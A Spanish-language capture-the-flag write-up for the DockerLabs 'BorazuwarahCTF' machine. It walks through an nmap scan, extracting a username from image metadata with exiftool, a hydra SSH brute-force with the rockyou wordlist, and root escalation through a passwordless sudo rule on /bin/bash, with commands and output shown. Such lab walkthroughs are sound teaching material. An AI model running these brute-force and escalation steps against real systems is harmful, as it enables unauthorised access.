CTF-DockerLabs-BorazuwarahCTF
WriteUps maquina BorazuwarahCTF de DockerLabs
tags:
- CTF
- estado/completado
- plataforma: [DockerLabs]
- dificultad: Muy fácil
- autor: [EBorazuwarah]
Datos
[!INFO] BorazuwarahCTF
- Nombre: BorazuwarahCTF
- SO: Linux
- Dificultad: Muy fácil
- Enlace: Dockerlabs
[!TODO] Objetivo
- 🚩Ingresar a la maquina como algún usuario.
- 🚩Elevar privilegios una vez obtenido el acceso.
El primer paso consiste en iniciar la máquina, lo cual es tan sencillo como ejecutar el siguiente comando después de haber descargado la maquina:
└─$ sudo bash auto_deploy.sh borazuwarahctf.tar
Reconocimiento
- Una vez iniciada la maquina, el mismo script de inicio me da la dirección IP a lo cual procedo a realizar un escaneo de puertos de la maquina y el resultado es el siguiente:
└─# nmap 172.17.0.2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 12:42 -05
Nmap scan report for 172.17.0.2
Host is up (0.000036s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:42:AC:11:00:02 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
Con ello ahora se que existe el puerto 80 abierto y el puerto 22 con el servicio ssh.
Chequeando puerto 80
- Lo primero que hago es visitar la pagina web que aparece en el puerto 80 con el servicio web y resulta que solo tengo una imagen de huevo sorpresa que dice: Te quiero con el siguiente código:
<html -
<body -
<img src='[imagen.jpeg](http://172.17.0.2/imagen.jpeg)' -
</body -
</html -
Código bastante sencillo y pues me parece extraño la importancia a la imagen, así que analizo la imagen su metadatos, de la siguiente forma: exiftool descarga.jpeg
y con eso obtengo un usuario:
└─# exiftool descarga.jpeg
ExifTool Version Number : 12.76
File Name : descarga.jpeg
Directory : .
File Size : 19 kB
File Modification Date/Time : 2024:05:28 12:37:09-05:00
File Access Date/Time : 2024:05:28 12:37:09-05:00
File Inode Change Date/Time : 2024:05:28 12:37:09-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
XMP Toolkit : Image::ExifTool 12.76
Description : ---------- User: xxxxxxxx ----------
Title : ---------- Password: ----------
Image Width : 455
Image Height : 455
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 455x455
Megapixels : 0.207
Fuerza bruta SSH
- Ahora que ya tengo un usuario, procedo a realizar un ataque de fuerza bruta usando
hydra
como en las otras maquinas, de la siguiente manera:
hydra -l xxxxxxxx -P /usr/share/wordlists/rockyou.txt 172.17.0.2 ssh
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: xxxxxxxx password: xxxxxxxx
Y rápidamente me encuentra la contraseña del usuario, a lo que me conecto por SSH.
Elevando privilegios
Estando dentro de la maquina, realizo un típico sudo -l
y el resultado es:
sudo -l
Matching Defaults entries for borazuwarah on 61599ead1e0b:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User borazuwarah may run the following commands on 61599ead1e0b:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/bash
A lo que sin dudarlo realizo un: sudo /bin/bash
y listo, de esa manera soy root.
Comandos
[!IMPORTANT] Resumen de comandos utilizados
sudo bash auto_deploy.sh borazuwarahctf.tar
nmap 172.17.0.2
exiftool descarga.jpeg
hydra -l xxxxxxxx -P /usr/share/wordlists/rockyou.txt 172.17.0.2 ssh
sudo -l
¡Que la fuerza del hacking ético nos acompañe! :)